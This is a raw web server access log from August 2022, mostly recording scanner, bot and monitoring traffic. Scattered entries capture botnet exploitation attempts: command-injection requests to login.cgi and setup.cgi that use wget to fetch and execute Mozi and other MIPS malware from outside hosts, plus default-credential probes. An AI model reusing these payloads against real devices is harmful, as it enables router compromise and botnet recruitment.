201.150.173.87 - - [04/Aug/2022:03:22:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
45.95.55.5 - - [04/Aug/2022:03:23:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
162.62.191.231 - - [04/Aug/2022:03:23:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.64.1"
45.148.10.81 - - [04/Aug/2022:03:24:35 +0200] "GET http://example.com/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
104.248.15.205 - - [04/Aug/2022:03:28:14 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
138.229.236.137 - - [04/Aug/2022:03:32:41 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
2.57.122.98 - - [04/Aug/2022:03:38:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
2.57.122.98 - - [04/Aug/2022:03:38:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.95.55.5 - - [04/Aug/2022:03:39:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.211 - - [04/Aug/2022:03:40:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.211 - - [04/Aug/2022:03:40:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.211 - - [04/Aug/2022:03:40:14 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
2.57.122.98 - - [04/Aug/2022:03:41:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
2.57.122.98 - - [04/Aug/2022:03:42:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.148.10.81 - - [04/Aug/2022:03:43:30 +0200] "GET http://example.com/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
2.57.122.98 - - [04/Aug/2022:03:44:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
35.229.76.90 - - [04/Aug/2022:03:44:57 +0200] "GET /robots.txt HTTP/1.0" 404 327 "-" "ZoominfoBot (zoominfobot at zoominfo dot com)"
35.229.76.90 - - [04/Aug/2022:03:44:58 +0200] "GET / HTTP/1.0" 200 1229 "-" "ZoominfoBot (zoominfobot at zoominfo dot com)"
109.162.198.242 - - [04/Aug/2022:03:46:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
2.57.122.98 - - [04/Aug/2022:03:47:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
104.248.15.205 - - [04/Aug/2022:03:50:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
104.248.15.205 - - [04/Aug/2022:03:50:35 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "http://212.91.246.89/" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
112.31.0.113 - - [04/Aug/2022:03:54:55 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://112.31.0.113:33345/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 310 "-" "-"
112.118.173.218 - - [04/Aug/2022:03:56:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
134.122.36.38 - - [04/Aug/2022:03:57:04 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
134.122.36.38 - - [04/Aug/2022:03:57:05 +0200] "GET /system_api.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
134.122.36.38 - - [04/Aug/2022:03:57:05 +0200] "GET /c/version.js HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
134.122.36.38 - - [04/Aug/2022:03:57:06 +0200] "GET /streaming/clients_live.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
134.122.36.38 - - [04/Aug/2022:03:57:06 +0200] "GET /stalker_portal/c/version.js HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
134.122.36.38 - - [04/Aug/2022:03:57:07 +0200] "GET /stream/live.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Spotify / 1.1.39.612 Safari / 537.36"
134.122.36.38 - - [04/Aug/2022:03:57:07 +0200] "GET /flu/403.html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
134.122.36.38 - - [04/Aug/2022:03:57:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
45.95.55.5 - - [04/Aug/2022:04:11:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.95.55.5 - - [04/Aug/2022:04:13:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
172.91.47.43 - - [04/Aug/2022:04:16:11 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
45.95.55.5 - - [04/Aug/2022:04:18:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.95.55.5 - - [04/Aug/2022:04:22:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
165.227.110.135 - - [04/Aug/2022:04:25:15 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
143.244.42.113 - - [04/Aug/2022:04:26:22 +0200] "GET http://dyn.epicgifs.net/test6956.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
45.95.55.5 - - [04/Aug/2022:04:27:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.58 - - [04/Aug/2022:04:27:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.58 - - [04/Aug/2022:04:27:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.58 - - [04/Aug/2022:04:27:32 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
3.68.105.241 - - [04/Aug/2022:04:31:09 +0200] "CONNECT is.muni.cz:443 HTTP/1.1" 405 340 "-" "Java/1.8.0_312"
3.68.105.241 - - [04/Aug/2022:04:33:03 +0200] "CONNECT is.muni.cz:443 HTTP/1.1" 405 340 "-" "Java/1.8.0_312"
108.27.54.116 - - [04/Aug/2022:04:40:44 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
139.218.44.230 - - [04/Aug/2022:04:48:09 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
45.95.55.5 - - [04/Aug/2022:04:50:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
192.241.222.46 - - [04/Aug/2022:04:51:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.222.46 - - [04/Aug/2022:04:51:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.222.46 - - [04/Aug/2022:04:51:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.222.46 - - [04/Aug/2022:04:51:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
92.118.39.88 - - [04/Aug/2022:04:52:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
192.241.222.46 - - [04/Aug/2022:04:53:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
2.57.122.98 - - [04/Aug/2022:04:53:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
192.241.222.46 - - [04/Aug/2022:04:53:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.222.46 - - [04/Aug/2022:04:53:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.222.46 - - [04/Aug/2022:04:53:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.222.46 - - [04/Aug/2022:04:53:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.222.46 - - [04/Aug/2022:04:54:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
45.95.55.5 - - [04/Aug/2022:04:54:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.95.55.5 - - [04/Aug/2022:04:56:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
92.118.39.88 - - [04/Aug/2022:04:57:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
2.57.122.98 - - [04/Aug/2022:05:01:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
49.142.221.171 - - [04/Aug/2022:05:03:00 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
2.57.122.98 - - [04/Aug/2022:05:05:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
128.199.43.249 - - [04/Aug/2022:05:07:48 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
128.199.43.249 - - [04/Aug/2022:05:07:48 +0200] "GET /system_api.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
128.199.43.249 - - [04/Aug/2022:05:07:48 +0200] "GET /c/version.js HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
128.199.43.249 - - [04/Aug/2022:05:07:48 +0200] "GET /streaming/clients_live.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
128.199.43.249 - - [04/Aug/2022:05:07:48 +0200] "GET /stalker_portal/c/version.js HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
128.199.43.249 - - [04/Aug/2022:05:07:48 +0200] "GET /stream/live.php HTTP/1.1" 404 320 "-" "VLC/3.0.8 LibVLC/3.0.8"
128.199.43.249 - - [04/Aug/2022:05:07:48 +0200] "GET /flu/403.html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
128.199.43.249 - - [04/Aug/2022:05:07:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
92.118.39.88 - - [04/Aug/2022:05:20:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
66.240.205.34 - - [04/Aug/2022:05:22:28 +0200] "Gh0st\xad" 501 321 "-" "-"
2.57.122.98 - - [04/Aug/2022:05:28:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
143.244.42.113 - - [04/Aug/2022:05:30:52 +0200] "GET http://dyn.epicgifs.net/test6956.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
45.95.55.5 - - [04/Aug/2022:05:33:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
2.57.122.98 - - [04/Aug/2022:05:38:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
113.92.157.21 - - [04/Aug/2022:05:39:36 +0200] "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" 404 324 "-" "-"
2.57.122.98 - - [04/Aug/2022:05:41:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.71.226.108 - - [04/Aug/2022:05:43:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
45.95.55.5 - - [04/Aug/2022:05:45:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
92.118.39.88 - - [04/Aug/2022:05:47:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
2.57.122.98 - - [04/Aug/2022:05:50:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
2.57.122.98 - - [04/Aug/2022:05:50:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
2.57.122.98 - - [04/Aug/2022:05:56:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.95.55.5 - - [04/Aug/2022:05:56:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
92.118.39.88 - - [04/Aug/2022:05:58:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
92.118.39.88 - - [04/Aug/2022:05:58:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
68.183.86.178 - - [04/Aug/2022:06:02:07 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
68.183.86.178 - - [04/Aug/2022:06:02:08 +0200] "GET /system_api.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
68.183.86.178 - - [04/Aug/2022:06:02:08 +0200] "GET /c/version.js HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
68.183.86.178 - - [04/Aug/2022:06:02:09 +0200] "GET /streaming/clients_live.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
68.183.86.178 - - [04/Aug/2022:06:02:10 +0200] "GET /stalker_portal/c/version.js HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
68.183.86.178 - - [04/Aug/2022:06:02:10 +0200] "GET /stream/live.php HTTP/1.1" 404 320 "-" "AlexaMediaPlayer/2.1.4676.0 (Linux;Android 5.1.1) ExoPlayerLib/1.5.9"
68.183.86.178 - - [04/Aug/2022:06:02:11 +0200] "GET /flu/403.html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
68.183.86.178 - - [04/Aug/2022:06:02:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
92.118.39.88 - - [04/Aug/2022:06:07:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
112.27.83.23 - - [04/Aug/2022:06:08:38 +0200] "POST /HNAP1/ HTTP/1.0" 404 311 "-" "-"
92.118.39.88 - - [04/Aug/2022:06:10:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
167.94.146.57 - - [04/Aug/2022:06:14:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.146.57 - - [04/Aug/2022:06:14:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.57 - - [04/Aug/2022:06:14:42 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
92.118.39.88 - - [04/Aug/2022:06:17:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.95.55.5 - - [04/Aug/2022:06:18:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
108.27.54.116 - - [04/Aug/2022:06:18:52 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
92.118.39.88 - - [04/Aug/2022:06:18:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
27.213.116.125 - - [04/Aug/2022:06:20:31 +0200] "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" 404 324 "-" "-"
54.196.121.181 - - [04/Aug/2022:06:21:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
45.155.126.211 - - [04/Aug/2022:06:25:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; tchelebi/1.0; +http://tchelebi.io)"
45.95.55.5 - - [04/Aug/2022:06:26:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
61.6.166.90 - - [04/Aug/2022:06:26:36 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
70.183.120.111 - - [04/Aug/2022:06:27:02 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
45.95.55.5 - - [04/Aug/2022:06:39:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.95.55.5 - - [04/Aug/2022:06:41:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.46 - - [04/Aug/2022:06:44:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.46 - - [04/Aug/2022:06:44:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.46 - - [04/Aug/2022:06:44:41 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
209.97.154.36 - - [04/Aug/2022:06:45:08 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
66.240.192.82 - - [04/Aug/2022:06:45:09 +0200] "\x16\x03\x01" 501 318 "-" "-"
66.240.192.82 - - [04/Aug/2022:06:45:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Mozilla/5.0 project_patchwatch'"
209.97.154.36 - - [04/Aug/2022:06:46:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
209.97.154.36 - - [04/Aug/2022:06:46:12 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "http://212.91.246.85/" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
154.209.125.62 - - [04/Aug/2022:06:50:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
116.24.190.53 - - [04/Aug/2022:06:51:39 +0200] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 329 "-" "-"
185.196.220.70 - - [04/Aug/2022:06:51:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
121.101.129.126 - - [04/Aug/2022:06:52:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
167.94.138.60 - - [04/Aug/2022:06:53:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.60 - - [04/Aug/2022:06:53:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.60 - - [04/Aug/2022:06:53:37 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
185.196.220.70 - - [04/Aug/2022:06:55:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [04/Aug/2022:07:00:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:01:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:02:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:03:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:04:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:05:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:06:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:07:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:08:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:09:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:10:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.196.220.70 - - [04/Aug/2022:07:11:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [04/Aug/2022:07:11:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:12:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:13:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:14:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
139.218.44.230 - - [04/Aug/2022:07:15:14 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Aug/2022:07:15:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:16:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2022:07:17:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.196.220.70 - - [04/Aug/2022:07:18:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [04/Aug/2022:07:18:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.196.220.70 - - [04/Aug/2022:07:19:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
